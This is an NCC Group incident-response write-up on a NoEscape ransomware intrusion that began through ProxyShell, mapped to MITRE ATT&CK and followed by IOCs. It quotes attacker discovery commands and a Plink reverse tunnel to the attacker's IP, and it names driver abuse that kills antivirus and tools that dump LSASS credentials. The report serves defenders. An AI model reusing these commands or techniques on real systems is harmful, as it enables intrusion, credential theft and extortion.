Is this the real life? Is this just fantasy? Caught in a landslide, NoEscape from NCC Group


Author: Alex Jessop (@ThisIsFineChief)

Summary

Tl;dr

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.

Below provides a summary of findings which are presented in this blog post: 

  • Initial access gained via a publicly disclosed vulnerability in an externally facing server
  • Use of vulnerable drivers to disable security controls
  • Remote Desktop Protocol was used for Lateral Movement
  • Access persisted through tunnelling RDP over SSH
  • Exfiltration of data via Mega
  • Execution of ransomware via scheduled task

NoEscape

NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.

Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add on to further impact victims.

Incident Overview

NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.

The threat actor seemed opportunistic in nature, whose objective was monetary gain with a double extortion method of ransomware which included data exfiltration. However, they did appear low skilled due to a kitchen sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to enact the same job for the threat actor, which is quite a noisy approach often not observed by the more sophisticated threat actor.

A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider, however this was interrupted due to premature execution of the ransomware which encrypted files that were being exfiltrated.

Timeline

  • T – Initial Access gained via webshell
  • T+1 min – Initial recon and credential dumping activity
  • T+9 min – Secondary access method established via Plink
  • T+18 days – Second phase of credential dumping activity
  • T+33 days – Data Exfiltration
  •  T+33 days – Ransomware Executed

Mitre TTPs

Initial Access

T1190 – Exploit Public-Facing Application

In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.

WebShell were uploaded to the victims Microsoft Exchange server and gave the threat actor an initial foothold on the network.

Execution

T1059.001 – Command and Scripting Interpreter: PowerShell

PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.

T1059.003 – Command and Scripting Interpreter: Windows Command Shell

Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.

  • net  localgroup administrators
  • cmd.exe  /c net group ”REDACTED” /domain
  • cmd.exe  /c WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

T1053.005 – Scheduled Task

As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.

Persistence 

T1505.003 – Server Software Component: Web Shell

Web Shells provided the threat actor continued access to the estate through the initial access vector.

Privilege Escalation

T1078.002 – Valid Accounts: Domain Accounts

Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution

T1078.003 – Valid Accounts: Local Accounts

The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.

Defence Evasion

T1562.001 – Impair Defences: Disable or Modify Tools

The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.

File Description
Gmer.exe GMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR
aswArPot.sys An Avast antivirus driver deployed by threat actors to disable antivirus solutions.
mhyprot2.sys Genshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes.

Credential Access

T1003 – Credential Dumping

Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.

File Description
CSDump.exe Unknown dumping tool (no longer on disk)
Fgdump.exe A tool for mass password auditing of the Windows systems by dumping credentials from LSASS
MemoryDumper.exe Creates an encrypted memory dump from LSASS process to facilitate offline cracking of passwords hashes.

Discovery

T1087.001 – Account Discovery: Local Account

A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:

net localgroup administrators

net group “REDACTED” /domain

T1018 – Remote System Discovery

Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:

netdom query /d:REDACTED PDC

Lateral Movement

T1021.001 – Remote Desktop Protocol

Valid domain credentials were obtained through dumping the LSASS process, these accounts were then used to laterally move across the environment via RDP.

Command and Control

T1572 – Protocol Tunnelling

Secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY link onto multiple hosts in the environment. A SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.

p64.exe REDACTED@172.93.181[.]238 -pw REDACTED -P 443 -2 -4 -T -N -C -R 0.0.0.0:10445:127.0.0.1:3389

T1219 – Remote Access Software

The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.

Exfiltration

T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

As has become common when data is exfiltrated from a victims estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.

Impact

T1486 – Data Encrypted for Impact

The encryptor targeted all files on the C: drive except those with the below extension:

bat, bin, cmd, com, cpl, dat, dll, drv, exe, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme

IOC List

Value Type Description
142D950E7DD975056BD3487672C14C26450D55C1 SHA1 Mega Sync
2F366382D2DB32AACA15F9CADC14C693B33C361F SHA1 Ransomware binary
4709827c7a95012ab970bf651ed5183083366c79 SHA1 Putty Link
75DB5A0B47783B4E4C812CF521C3A443FACB6BBB SHA1 Ransomware binary
BB3593007FE44993E102830EDC3255836A97FB01 SHA1 Ransomware binary
FB0A150601470195C47B4E8D87FCB3F50292BEB2 SHA1 PsExec
214551A8C07633D8C70F7BE4689EFE3BB74ABFD6E64264CF440100413EA6BE6B SHA256 Mega Sync
53B5A02259C69AB213BA1458D7F70B01614CC32E040B849AD67FEFB07A725945 SHA256 Ransomware binary
828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d SHA256 Putty Link
078212DEA0C7FD9CDFA40DBB320B29900F4E8BA0E64D2199F6CAE0BC23D1C625 SHA256 Ransomware binary
2020CAE5115B6980D6423D59492B99E6AAA945A2230B7379C2F8AE3F54E1EFD5 SHA256 Ransomware binary
AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4 SHA256 PsExec
172.93.181[.]238 IP Malicious IP used for tunnelling via Plink
66.203.125[.]14 IP Mega IP

MITRE ATT CK® 

Tactic  Technique  ID  Description  
Initial Access Exploit Public-Facing Application T1190 The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited
Execution Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 Native Windows commands were utilised during the discovery phase of the endpoint and victim estate
Execution Scheduled Task T1053.005 A scheduled task was utilised to execute the ransomware binary
Persistence Server Software Component: Web Shell T1505.003 Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities
Privilege Escalation Valid Accounts: Domain Accounts T1078.002 Credentials to domain accounts were obtained and utilised for lateral movement
Privilege Escalation Valid Accounts: Local Accounts T1078.003 A disabled local account was re-enabled by the threat actor and used.
Defence Evasion Impair Defenses: Disable or Modify Tools T1562.001 Tooling was deployed in an attempt to disable the deployed endpoint security controls
Credentials Access Credential Dumping T1003 Various different tools were deployed to dump credentials from LSASS
Discovery Account Discovery: Local Account T1087.001 ‘net’ native Windows command was utilised to discovery users in the domain administrator group
Discovery Remote System Discovery T1018 ‘netdom’ was utilised to discover the primary domain controller for the victims estate
Lateral Movement Remote Desktop Protocol T1021.001 The primary method of lateral movement was RDP
Command and Control Protocol Tunnelling T1572 PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells
Command and Control Remote Access Software T1219 Access was gained to the existing TeamViewer deployment and utilised for lateral movement
Exfiltration Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 MegaSync was utilised to exfiltrate data to the cloud storage solution Mega
Impact Data Encrypted for Impact T1486 Ransomware was deployed across the estate

References

[1] – Cyble — ‘NoEscape’ Ransomware-as-a-Service (RaaS)

[2] – Meet NoEscape: Avaddon ransomware gang’s likely successor – RedPacket Security


Source: https://research.nccgroup.com/2023/11/20/is-this-the-real-life-is-this-just-fantasy-caught-in-a-landslide-noescape-from-ncc-group/